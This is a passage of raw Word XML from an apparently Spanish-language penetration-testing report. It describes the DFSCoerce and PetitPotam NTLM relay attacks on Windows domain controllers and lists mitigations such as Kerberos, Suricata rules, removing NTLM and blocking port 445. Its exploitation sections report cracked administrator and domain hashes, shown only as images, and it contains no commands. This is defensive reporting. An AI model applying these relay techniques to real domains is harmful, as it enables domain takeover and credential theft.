          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Seguimiento de parches y actualizaciones: Mantener los sistemas y dispositivos de la red actualizados con los últimos parches y actualizaciones de seguridad es fundamental para mitigar vulnerabilidades conocidas. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD94424" w14:textId="6F5B111A" w:rsidR="000F27CB" w:rsidRDefault="000F27CB" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1410"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explotación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194B4AC7" w14:textId="726F71CA" w:rsidR="000F27CB" w:rsidRDefault="000F27CB" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1410"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Se consigue descifrar el hash de la contraseña de Administrador del sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CC6D3D" w14:textId="77777777" w:rsidR="000F27CB" w:rsidRDefault="000F27CB" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1410"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5608A685" w14:textId="24E9219F" w:rsidR="000F27CB" w:rsidRDefault="000F27CB" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1410"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EBB9A6B" wp14:editId="27E3BF2D">
            <wp:extent cx="5685527" cy="2858135"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="315969633" name="Imagen 31596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5144" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId122">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5707260" cy="2869060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="495A52D0" w14:textId="77777777" w:rsidR="000F27CB" w:rsidRPr="00C47ADA" w:rsidRDefault="000F27CB" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1410"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A49582D" w14:textId="39AB66F6" w:rsidR="003D3AE0" w:rsidRPr="001A4A03" w:rsidRDefault="003D3AE0" w:rsidP="00B41C8F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7CDA">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Vulnerabilidad: Coerce o DFSCoerce</w:t>
      </w:r>
      <w:r w:rsidR="007F7CDA">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F7CDA" w:rsidRPr="007F7CDA">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(MS-DFSNM</w:t>
      </w:r>
      <w:r w:rsidR="007F7CDA">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47863AB3" w14:textId="77777777" w:rsidR="001A4A03" w:rsidRPr="007F7CDA" w:rsidRDefault="001A4A03" w:rsidP="001A4A03">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AC877D7" w14:textId="39CA5859" w:rsidR="003D3AE0" w:rsidRDefault="003D3AE0" w:rsidP="003D3AE0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Descripción: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AEC840" w14:textId="77777777" w:rsidR="007B2729" w:rsidRDefault="007B2729" w:rsidP="003D3AE0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16417A39" w14:textId="505140C2" w:rsidR="007B2729" w:rsidRDefault="007B2729" w:rsidP="003D3AE0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B2729">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Esta vez abusa de MS-DFSNM, protocolo que proporciona la capacidad de operar el sistema de archivos distribuido de Windows (DFS) a través de una interfaz de llamada a procedimiento remoto (RPC). Concretamente y por el momento, el método usado es NetrDfsRemoveStdRoot que solo funciona contra los controladores de dominio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B276D04" w14:textId="0F4F37DD" w:rsidR="001A4A03" w:rsidRPr="001A4A03" w:rsidRDefault="001A4A03" w:rsidP="001A4A03">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A4A03">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Como resultado, un  atacante que obtenga acceso limitado a un dominio de Windows puede convertirse fácilmente en el administrador del dominio y ejecutar cualquier comando de su elección.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E46F05" w14:textId="77777777" w:rsidR="003D3AE0" w:rsidRDefault="003D3AE0" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00345A80">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Solución:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642CC418" w14:textId="4383FDE4" w:rsidR="003D3AE0" w:rsidRDefault="003D3AE0" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00345A80">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implementar autenticación fuerte: Se recomienda utilizar métodos de autenticación más seguros, como Kerberos o autenticación multifactor, en lugar de depender únicamente de NTLM. Estas soluciones ofrecen una mayor resistencia a los ataques de relé NTLM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A5C8E1" w14:textId="2ABC87A2" w:rsidR="003D3AE0" w:rsidRDefault="003D3AE0" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Aplicar reglas de un IPS como suricata, que es el proporcionado para la defensa en el informe de pentesting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E185201" w14:textId="77777777" w:rsidR="003D3AE0" w:rsidRDefault="003D3AE0" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Eliminar la autentificación NTLM del servidor web de certificados en todas las máquinas que sean servidores de certificados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760ECA59" w14:textId="77777777" w:rsidR="003D3AE0" w:rsidRDefault="003D3AE0" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Eliminar la autentificación NTLM de todos los controladores de dominio y usar Kerberos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3075BE4E" w14:textId="77777777" w:rsidR="003D3AE0" w:rsidRDefault="003D3AE0" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Configurar SSL en todos los servidores web de certificados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C19AB8" w14:textId="639253FC" w:rsidR="003D3AE0" w:rsidRDefault="003D3AE0" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Aplicar reglas del firewall sobre el puerto 4</w:t>
      </w:r>
      <w:r w:rsidR="007F7CDA">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5 que es el puerto donde funciona el prot</w:t>
      </w:r>
      <w:r w:rsidR="0071585E">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">colo aprovechado para el </w:t>
      </w:r>
      <w:r w:rsidR="007F7CDA">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>taque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC151D5" w14:textId="1AAF1301" w:rsidR="007F7CDA" w:rsidRDefault="007F7CDA" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Deshabilitar el SMBv1 de todos los controladores de dominio y activar versiones posteriores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1118CC0E" w14:textId="19B240E2" w:rsidR="00657AE5" w:rsidRDefault="007F7CDA" w:rsidP="00657AE5">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Estas reglas serían válidas para el ataque de PetitPotam</w:t>
      </w:r>
      <w:r w:rsidR="004A1FCC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> menos la regla sobre el puerto 445.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D4D313" w14:textId="77777777" w:rsidR="00D06ACC" w:rsidRDefault="00D06ACC" w:rsidP="00657AE5">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="255F8F33" w14:textId="2A8FE94F" w:rsidR="00D06ACC" w:rsidRDefault="00D06ACC" w:rsidP="00657AE5">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explotación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B931F75" w14:textId="7FB04D6B" w:rsidR="00D06ACC" w:rsidRDefault="00D06ACC" w:rsidP="00657AE5">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Como en el siguiente ataque se consigue el acceso a todos los </w:t>
      </w:r>
      <w:r w:rsidR="000F27CB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hashes del dominio, como en el ataque de PetitPotam:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2284D5A6" w14:textId="00970610" w:rsidR="000F27CB" w:rsidRDefault="000F27CB" w:rsidP="00657AE5">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CD037B4" wp14:editId="144572ED">
            <wp:extent cx="6645910" cy="5035550"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="412946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46248" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId355">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="5035550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65050D98" w14:textId="008FA7A6" w:rsidR="000F27CB" w:rsidRDefault="000F27CB" w:rsidP="00657AE5">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Además de descifrar el hash de la contraseña del administrador del dominio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30460FAA" w14:textId="77777777" w:rsidR="000F27CB" w:rsidRDefault="000F27CB" w:rsidP="00657AE5">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="746655D6" w14:textId="541506F1" w:rsidR="00C15B86" w:rsidRDefault="000F27CB" w:rsidP="00657AE5">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45B82E15" wp14:editId="45CCB000">
            <wp:extent cx="5142857" cy="1342857"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="624448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48076" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId356">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5142857" cy="1342857"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="654C81F8" w14:textId="77777777" w:rsidR="000F27CB" w:rsidRPr="00345A80" w:rsidRDefault="000F27CB" w:rsidP="00657AE5">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246BBAA4" w14:textId="73098704" w:rsidR="003D3AE0" w:rsidRDefault="003D3AE0" w:rsidP="003D3AE0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F170F">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Vulnerabilidad: PetitPotam</w:t>
      </w:r>
      <w:r w:rsidR="00A225A3">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00A225A3" w:rsidRPr="00A225A3">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MS-EFSRPC</w:t>
      </w:r>
      <w:r w:rsidR="00A225A3">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E3EAF6" w14:textId="77777777" w:rsidR="003D3AE0" w:rsidRDefault="003D3AE0" w:rsidP="003D3AE0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37274DFD" w14:textId="77777777" w:rsidR="00DF2F26" w:rsidRDefault="003D3AE0" w:rsidP="001A4A03">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00345A80">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43320FBC" w14:textId="705CE76E" w:rsidR="00D10CF3" w:rsidRPr="00D10CF3" w:rsidRDefault="003D3AE0" w:rsidP="001A4A03">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00345A80">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D10CF3" w:rsidRPr="00D10CF3">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>La vulnerabilidad PetitPotam aprovecha una debilidad en el protocolo MS-EFSRPC utilizado en los sistemas operativos Windows. Al explotar esta vulnerabilidad, un atacante puede lanzar ataques de relé NTLM y obtener las credenciales NTLM válidas del controlador de dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7292807A" w14:textId="77777777" w:rsidR="00D10CF3" w:rsidRPr="00D10CF3" w:rsidRDefault="00D10CF3" w:rsidP="001A4A03">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D10CF3">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">El ataque se realiza interceptando las solicitudes de autenticación NTLM enviadas por un cliente al controlador de dominio. El atacante puede utilizar técnicas de relé para retransmitir estas solicitudes al controlador de dominio objetivo sin ser </w:t>
      </w:r>
      <w:r w:rsidRPr="00D10CF3">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>detectado. Al obtener las credenciales NTLM válidas, el atacante puede usarlas para acceder a sistemas y recursos protegidos, lo que podría permitir la ejecución de acciones maliciosas y la escalada de privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B9C0D9" w14:textId="7F58EE8D" w:rsidR="003D3AE0" w:rsidRDefault="00D10CF3" w:rsidP="00657AE5">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D10CF3">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Es importante destacar que esta vulnerabilidad se basa en una debilidad inherente en el protocolo MS-EFSRPC, y no en una configuración incorrecta específica de los sistemas o en una falta de parches de seguridad. Como resultado, la mitigación de esta vulnerabilidad puede ser desafiante y requerir medidas adicionales para proteger la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC68D57" w14:textId="77777777" w:rsidR="00657AE5" w:rsidRDefault="00657AE5" w:rsidP="00657AE5">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F7C8AD" w14:textId="77777777" w:rsidR="0071585E" w:rsidRDefault="003D3AE0" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00345A80">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Solución: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16282ABD" w14:textId="65124541" w:rsidR="003D3AE0" w:rsidRDefault="003D3AE0" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00345A80">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implementar autenticación fuerte: Se recomienda utilizar métodos de autenticación más seguros, como Kerberos o autenticación multifactor, en lugar de depender únicamente de NTLM. Estas soluciones ofrecen una mayor resistencia a los ataques de relé NTLM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5068DD0E" w14:textId="77777777" w:rsidR="0071585E" w:rsidRDefault="0071585E" w:rsidP="0071585E">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00345A80">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implementar autenticación fuerte: Se recomienda utilizar métodos de autenticación más seguros, como Kerberos o autenticación multifactor, en lugar de depender únicamente de NTLM. Estas soluciones ofrecen una mayor resistencia a los ataques de relé NTLM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F54211" w14:textId="77777777" w:rsidR="0071585E" w:rsidRDefault="0071585E" w:rsidP="0071585E">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Aplicar reglas de un IPS como suricata, que es el proporcionado para la defensa en el informe de pentesting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F47A2B" w14:textId="77777777" w:rsidR="0071585E" w:rsidRDefault="0071585E" w:rsidP="0071585E">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Eliminar la autentificación NTLM del servidor web de certificados en todas las máquinas que sean servidores de certificados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FF7DFD" w14:textId="77777777" w:rsidR="0071585E" w:rsidRDefault="0071585E" w:rsidP="0071585E">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Eliminar la autentificación NTLM de todos los controladores de dominio y usar Kerberos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65913FDB" w14:textId="77777777" w:rsidR="0071585E" w:rsidRDefault="0071585E" w:rsidP="0071585E">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
